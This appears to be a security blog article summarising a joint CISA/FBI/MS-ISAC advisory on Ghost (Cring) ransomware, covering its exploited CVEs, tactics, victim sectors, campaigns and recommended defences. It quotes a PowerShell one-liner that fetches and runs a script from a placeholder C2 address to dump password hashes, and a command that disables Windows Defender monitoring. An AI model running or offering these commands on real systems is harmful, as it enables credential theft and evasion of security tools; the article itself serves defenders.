Table of Contents
Ghost (Cring) ransomware, also known as Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture, is a significant cybersecurity threat that has impacted organizations globally since its emergence in early 2021. This ransomware strain, attributed to threat actors located in China, leverages known vulnerabilities in internet-facing services to gain initial access, encrypt data, and extort victims for financial gain. The rapid deployment of the ransomware following initial compromise, coupled with the group's indiscriminate targeting across various sectors and geographies, makes Ghost (Cring) a particularly dangerous adversary. A joint Cybersecurity Advisory (CSA) from the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) highlights the severity of this threat and provides crucial guidance for network defenders.
Origins & Evolution
Ghost (Cring) ransomware was first observed in early 2021, exploiting unpatched vulnerabilities in internet-facing applications. The threat actors behind Ghost (Cring) are believed to be located in China, operating with a primary motivation of financial gain. The ransomware's rapid evolution is characterized by frequent changes in payloads, ransom notes, file extensions, and contact email addresses, contributing to difficulties in consistent attribution. This agility suggests an ongoing development effort and a commitment to evading detection.
The association with multiple ransomware family names (Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture) indicates potential rebranding efforts, code sharing, or collaboration within the cybercriminal ecosystem. While not explicitly linked to a specific Advanced Persistent Threat (APT) group, the techniques and targeting patterns align with financially motivated cybercrime operations.
Tactics & Techniques
The Ghost (Cring) ransomware group operates with a distinct set of tactics, techniques, and procedures (TTPs), characterized by speed and exploitation of known vulnerabilities. Key aspects of their modus operandi include:
Initial Access: The primary attack vector is exploiting known vulnerabilities in public-facing applications. This circumvents security measures that focus on phishing or malware attachments. Specific vulnerabilities targeted include:
* Fortinet FortiOS: CVE-2018-13379 (a directory traversal vulnerability in the SSL VPN web portal).
* Adobe ColdFusion: CVE-2010-2861 and CVE-2009-3960 (directory traversal vulnerabilities).
* Microsoft SharePoint: CVE-2019-0604 (a remote code execution vulnerability).
* Microsoft Exchange (ProxyShell): CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207 (remote code execution vulnerabilities).
Execution: Once inside the network, the threat actors use various methods to execute their payloads:
* Web Shells: Uploading web shells (such as a variant of Chunk-Proxy) to compromised servers for persistent access.
* Windows Command Prompt & PowerShell: Utilizing built-in Windows tools for downloading and executing additional malware, including Cobalt Strike Beacon.
* Cobalt Strike Beacon A commercial penetration tool used by the threat actor.
Persistence: While Ghost (Cring) does not prioritize long-term persistence, they employ several techniques to maintain access, typically operating within the network for just a few days:
* New Account Creation: Sporadically creating new local or domain accounts.
* Password Changes: Modifying passwords for existing accounts.
* Web Shells (2024): Increasingly, web shells provide a persistent backdoor.
Privilege Escalation: The group leverages various tools and techniques to escalate privileges:
* Cobalt Strike: Built-in functions to steal process tokens and impersonate the SYSTEM user.
* Open-Source Tools: Utilizing tools like SharpZeroLogon, SharpGPPPass, BadPotato, and GodPotato to exploit known privilege escalation vulnerabilities.
Credential Access: Accessing credentials is a key step for lateral movement and further compromise:
* Cobalt Strike "hashdump": Using Cobalt Strike's built-in functionality to extract password hashes.
* Mimikatz: Employing the well-known Mimikatz tool for credential dumping.
* PowerShell Commands to get password hashes: powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http[:]//<C2 SERVER IP>/b'); Get-PassHashes"
Defense Evasion: The group actively attempts to evade detection and disable security measures:
* Antivirus Disabling: Specifically targeting and disabling Windows Defender using PowerShell commands. Example: Set-MpPreference -DisableRealtimeMonitoring $true.
* AV Checking: Listing running processes to check for antivirus software.
Discovery: Gathering information about the compromised network is crucial for lateral movement:
* Cobalt Strike Commands: Using Cobalt Strike for domain account discovery.
* Open-Source Tools: Employing tools like SharpShares (for network share discovery), Ladon 911, and SharpNBTScan (for remote system discovery).
* Network Share Discovery SharpShares.exe
Lateral Movement: Spreading across the network is essential for maximizing the impact of the ransomware:
* WMIC: Utilizing Windows Management Instrumentation Command-line (WMIC) to run PowerShell commands on other systems, often to deploy Cobalt Strike.
* Base64 Encoded PowerShell: Using encoded PowerShell commands to execute Cobalt Strike in memory, evading detection.
* Abandonment: If lateral movement attempts fail, the attackers often abandon the attack, indicating a focus on efficiency and avoiding detection.
Exfiltration: While not the primary focus, data exfiltration does occur:
* Ransom Notes: Claims of data exfiltration are made in ransom notes, though the actual amount of data stolen is often limited.
* Exfiltration Methods: Limited use of Cobalt Strike Team Servers, Mega.nz, and web shells for exfiltration.
Command and Control (C2): Communication with the attackers' infrastructure is maintained through:
* Cobalt Strike Beacon & Team Servers: Primarily using Cobalt Strike over HTTP/HTTPS.
* Direct IP Referencing: Directly referencing C2 server IP addresses, rarely registering domains.
* Encrypted Email: Utilizing encrypted email services (Tutanota, Skiff, ProtonMail, Onionmail, Mailfence) for communication with victims.
* TOX IDs: Used in ransom notes starting around August 2024.
Impact and Encryption: The final stage involves encrypting data and demanding a ransom:
* Ransomware Executables: Using various executables, including Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe.
* Encryption Scope: Encrypting specific directories or entire systems.
* File Extension Exclusion: Excluding certain file extensions and system folders to maintain system stability for ransom payment.
* System Recovery Inhibition: Clearing Windows Event Logs, disabling Volume Shadow Copy Service, and deleting shadow copies to hinder recovery efforts.
* Ransom Demands: Demands range from tens to hundreds of thousands of dollars in cryptocurrency.
Targets or Victimology
Ghost (Cring) ransomware exhibits a broad and indiscriminate targeting pattern, affecting organizations across diverse sectors and geographic locations. This opportunistic approach suggests that the threat actors prioritize exploiting readily available vulnerabilities over targeting specific industries or regions. Victims have been reported in over 70 countries, including China itself.
Key sectors impacted include:
Critical Infrastructure: This includes organizations providing essential services, highlighting the potential for significant societal disruption.
Education: Schools and universities have been targeted, disrupting educational operations.
Healthcare: Hospitals and healthcare providers are vulnerable, posing risks to patient care and data privacy.
Government: Government networks have been compromised, potentially impacting public services and national security.
Religious Institutions: Organizations with lower security capacity than large businesses.
Technology/Manufacturing: Disruption to production and supply chains.
Small and Medium-Sized Businesses (SMBs): SMBs are often targeted due to potentially weaker security postures.
Retail (Especially E-commerce): Targets payment processing systems and customer data. Impact: Disrupts sales, damages consumer trust.
Financial Institutions: Targets customer and transaction data. The motivation behind Ghost (Cring) is primarily financial gain. The ransomware demands vary significantly, indicating a flexible approach to extortion based on the perceived value of the compromised data or the victim's ability to pay. As security logging becomes more critical, defenders need robust monitoring.
Attack Campaigns
Several attack campaigns, attributed to the Ghost (Cring) threat actor, underline its ongoing threat.
Early 2021 - Emergence: Ghost (Cring) ransomware attacks begin, exploiting vulnerabilities in internet-facing applications. The attacks are characterized by rapid deployment and a focus on encryption.
Ongoing Activity (2021-2025): The ransomware continues to be active, with ongoing investigations by the FBI and CISA as recently as January 2025. This indicates a persistent and evolving threat. The group consistently rotates payloads, file extensions, ransom notes, and email addresses.
ProxyShell Exploitation (2021): Ghost (Cring) actors leverage the ProxyShell vulnerabilities in Microsoft Exchange servers to gain initial access, highlighting their ability to quickly adopt newly disclosed exploits.
Blue Yonder (November 2024): A major provider of supply chain management solutions that caused major disruption.
Exploitation of Cleo Software Vulnerabilities: Cleo’s file transfer products allowed attackers to execute remote code and steal sensitive data from affected organizations
It's important to note that this is not an exhaustive list, and the group likely conducts numerous smaller, unreported attacks. The widespread geographic distribution and diverse range of targeted sectors further underscore the ongoing risk posed by Ghost (Cring). Understanding indicator of compromise is vital in detecting such attacks.
Defenses
Protecting against Ghost (Cring) ransomware requires a multi-layered approach that focuses on prevention, detection, and response. Given the group's reliance on exploiting known vulnerabilities, the following measures are crucial:
Patch Management: This is the most critical defense. Implement a robust and timely patching process for all operating systems, software, and firmware. Prioritize patching internet-facing applications, especially those with known vulnerabilities exploited by Ghost (Cring) (Fortinet, Adobe ColdFusion, Microsoft Exchange, SharePoint). A good patch management strategy can make all the difference.
Vulnerability Scanning: Regularly scan your network for vulnerabilities, particularly on internet-facing systems. This helps identify and address weaknesses before they can be exploited.
Network Segmentation: Implement network segmentation to limit the lateral movement of attackers within your network. This can prevent a single compromised system from impacting the entire organization.
Multi-Factor Authentication (MFA): Enforce phishing-resistant MFA for all privileged accounts and email accounts. This adds a crucial layer of security, even if credentials are stolen.
User Training: Conduct regular security awareness training to educate users about phishing attacks, social engineering, and other common attack vectors.
PowerShell Monitoring: Monitor for unauthorized or suspicious PowerShell activity. Implement least privilege principles to restrict PowerShell execution where possible.
Application Allowlisting: Implement application allowlisting to prevent unauthorized software from running on your systems. This can help block the execution of ransomware payloads.
Script Allowlisting: Similarly, restrict the execution of unauthorized scripts.
Network Traffic Allowlisting: Control network traffic to limit communication with known malicious IP addresses and domains.
Abnormal Activity Monitoring: Implement robust monitoring and alerting systems to detect and investigate unusual network traffic, user activity, and system changes.
Limit Service Exposure: Disable unused ports and services (e.g., RDP, FTP, SMB) on internet-facing systems. Restrict access to necessary services using VPNs and firewalls.
Enhance Email Security: Implement strong email filtering to block malicious attachments and links. Utilize email security protocols like DMARC, DKIM, and SPF to prevent email spoofing. Understanding what is SPF is critical in preventing such attacks.
Backups: Maintain regular, offline, and tested backups of all critical data. Ensure backups are segmented from the network and cannot be encrypted by ransomware.
Incident Response Plan: Develop and regularly test an incident response plan to ensure a coordinated and effective response to a ransomware attack. A solid cyber incident response plan is essential for minimizing damage.
AI-Powered Threat Detection: Explore and utilize AI-powered detection that detects subtle attacker behavior
Conclusion
Ghost (Cring) ransomware represents a significant and ongoing threat to organizations worldwide. The group's reliance on exploiting known vulnerabilities, coupled with its rapid deployment of ransomware and use of advanced evasion techniques, makes it a formidable adversary. By prioritizing vulnerability patching, implementing robust security controls, and fostering a culture of security awareness, organizations can significantly reduce their risk of falling victim to Ghost (Cring) and other similar ransomware threats. The joint advisory from CISA, FBI, and MS-ISAC underscores the importance of proactive cybersecurity measures and the need for continued vigilance in the face of evolving cyber threats. The focus on fundamental security practices – patching, backups, MFA, segmentation, and training – remains the most effective defense against this and many other ransomware families. Considering Zero Trust Security models can add an additional layer of defense. For further protection, explore what is a VPN.
Found this article interesting? Keep visit thesecmaster.com, and our social media page on Facebook, LinkedIn, Twitter, Telegram, Tumblr, Medium, and Instagram and subscribe to receive tips like this.
ou may also like these articles:
What Cado Says About the New Malicious Docker Malware Campaign?
Protect Your Windows and Mac from JaskaGO- Go-Based Stealer Malware
Chinese APT Group Earth Estries Targets Critical Infrastructure with Advanced Cyber Attacks
Trend Micro Exposes Earth Estries' Advanced Cyber Espionage Campaign Across 13 Countries
Arun KL
Arun KL is a cybersecurity professional with 15+ years of experience in IT infrastructure, cloud security, vulnerability management, Penetration Testing, security operations, and incident response. He is adept at designing and implementing robust security solutions to safeguard systems and data. Arun holds multiple industry certifications including CCNA, CCNA Security, RHCE, CEH, and AWS Security.
- March 10, 2025
- March 10, 2025
- March 10, 2025
- March 10, 2025
Learn Something New with Free Email subscription
Learn Something New with Free Email subscription
Subscribe
Subscribe
Subscribe
Subscribe
- March 10, 2025
- March 10, 2025
- March 10, 2025
- March 10, 2025
